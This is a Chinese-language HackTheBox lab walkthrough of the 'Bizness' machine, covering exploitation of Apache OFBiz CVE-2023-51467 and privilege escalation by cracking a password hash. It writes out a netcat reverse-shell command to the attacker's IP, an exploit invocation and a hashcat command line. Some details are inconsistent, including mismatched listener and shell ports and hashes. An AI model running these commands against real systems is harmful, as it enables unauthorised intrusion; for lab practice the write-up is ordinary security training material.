HackTheBox Bizness
加更一个
HTB-Bizness
老规矩 介绍环境
攻击:10.10.14.5
靶机:10.10.11.252
还是nmap 扫一下基本的漏扫 现在喜欢直接-A 然后让他去扫
nmap -A 10.10.11.252
讲真的 这题我是没啥头绪的 看到个 80 端口 先去访问看看
访问的时候 会跳转域名
https://bizness.htb/
然后就发现访问不到 要做两步骤
1.导入burp证书--这一步就不截图了一搜就能搜到 太繁琐了 不占篇幅
2.hosts文件写入内容
10.10.11.252 https://bizness.htb/
就是把ip和域名对应上也没啥难得
然后正常访问页面 页面上没有啥能交互的地方
扫目录
dirsearch -u https://bizness.htb/ -e*
吐槽一下 kali 里面的浏览器真的太不好用了
看起来这个admin 真心动 但其实没啥用 -_-
然后看看登录页面
反正弱口令 SQL注入 都试了试 没用
忘记密码这里也试了 没有啥逻辑漏洞可以获取管理员权限的
到这里 我就已经懵逼了 完全没思路
然后看着包发呆 注意到他的Cookie有点特别
还行还没见过 .jvm1 这种Cookie 我又想是不是问题出在这里 搜了一下 没关系
然后拿剩下的Cookie搜
反正就是让我看到好像有希望 找到一个相关的洞
研究了 Apache OFBiz 漏洞,发现 CVE-2023–51467 允许绕过身份验证
然后觉得肯定就是这个了 再不行我就不干了
于是
nc -lnvp 1377
python3 exploit.py --url https://bizness.htb/ --cmd 'nc -e /bin/bash 10.10.14.5 1337'
反弹shell 试试看
终于get 到user flag了
但是难题接踵而至 sudo -l 没反应 应该是需要交互shell 说明sudo 需要输入密码 提权难到我了
最后就是问人 找答案 以下方式 都不是我自己做的了
交互式shell:
script /dev/null -qc /bin/bash
然后就一个一个看文件 最终在/opt/ofbiz/framework/resources/templates/ 中发现了一个有趣的文件AdminUserLoginData.xml
这个文件里有个 hash 值 : 47ca69ebb4bdc9ae0adec130880165d2cc05db1a
是密码 但问题是 你解不开 然后又找到一个文件/opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat
这个文件里面有个 hash 值 : $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
这就看出来了 sha加密 但还是不懂要怎么用
看到别的大佬 有这个工具可以用
或者
hashcat (kali 自带)
但是需要在这里转换下:
hashcat -m 120 -a 0 -d 1 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt
最后执行这个 这个 :d 是我看别人说这个是盐值?之类的东西 反正要加上
最终出来root密码
连接root 最后查看root flag
OK 完成了 总体就是这样